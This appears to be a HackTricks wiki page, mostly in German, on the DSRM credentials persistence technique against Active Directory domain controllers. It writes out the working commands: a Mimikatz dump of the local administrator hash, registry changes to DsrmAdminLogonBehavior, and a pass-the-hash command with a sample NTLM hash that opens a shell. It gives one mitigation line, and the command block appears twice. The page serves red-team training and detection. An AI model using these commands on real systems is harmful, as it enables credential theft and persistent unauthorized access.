DSRM Credentials

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

DSRM-Anmeldeinformationen

Es gibt ein lokales Administratorkonto in jedem DC. Mit Administratorrechten auf diesem Computer können Sie Mimikatz verwenden, um den Hash des lokalen Administrators zu dumpen. Dann müssen Sie die Registrierung ändern, um dieses Passwort zu aktivieren, damit Sie remote auf diesen lokalen Administratorbenutzer zugreifen können. Zuerst müssen wir den Hash des lokalen Administrators im DC dumpen:

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'

Dann müssen wir überprüfen, ob dieses Konto funktioniert, und wenn der Registrierungsschlüssel den Wert "0" hat oder nicht existiert, müssen Sie ihn auf "2" setzen:

Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior #Check if the key exists and get the value
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD #Create key with value "2" if it doesn't exist
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2  #Change value to "2"

Dann können Sie mit einem PTH den Inhalt von C$ auflisten oder sogar eine Shell erhalten. Beachten Sie, dass für die Erstellung einer neuen PowerShell-Sitzung mit diesem Hash im Speicher (für den PTH) die "Domäne", die verwendet wird, nur der Name der DC-Maschine ist:

sekurlsa::pth /domain:dc-host-name /user:Administrator /ntlm:b629ad5753f4c441e3af31c97fad8973 /run:powershell.exe
#And in new spawned powershell you now can access via NTLM the content of C$
ls \\dc-host-name\C$

Mehr Informationen dazu unter: https://adsecurity.org/?p=1714 und https://adsecurity.org/?p=1785

Minderung

Ereignis-ID 4657 - Überprüfung der Erstellung/Änderung von HKLM:\System\CurrentControlSet\Control\Lsa DsrmAdminLogonBehavior

Unterstützen Sie HackTricks

Überprüfen Sie die Abonnementpläne!
Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repos senden.

PreviousDiamond Ticket NextExternal Forest Domain - OneWay (Inbound) or bidirectional

Last updated 4 months ago

DSRM-Anmeldeinformationen

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'

Dann müssen wir überprüfen, ob dieses Konto funktioniert, und wenn der Registrierungsschlüssel den Wert "0" hat oder nicht existiert, müssen Sie ihn auf "2" setzen:

Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior #Check if the key exists and get the value
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD #Create key with value "2" if it doesn't exist
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2  #Change value to "2"

sekurlsa::pth /domain:dc-host-name /user:Administrator /ntlm:b629ad5753f4c441e3af31c97fad8973 /run:powershell.exe
#And in new spawned powershell you now can access via NTLM the content of C$
ls \\dc-host-name\C$

Minderung

Ereignis-ID 4657 - Überprüfung der Erstellung/Änderung von HKLM:\System\CurrentControlSet\Control\Lsa DsrmAdminLogonBehavior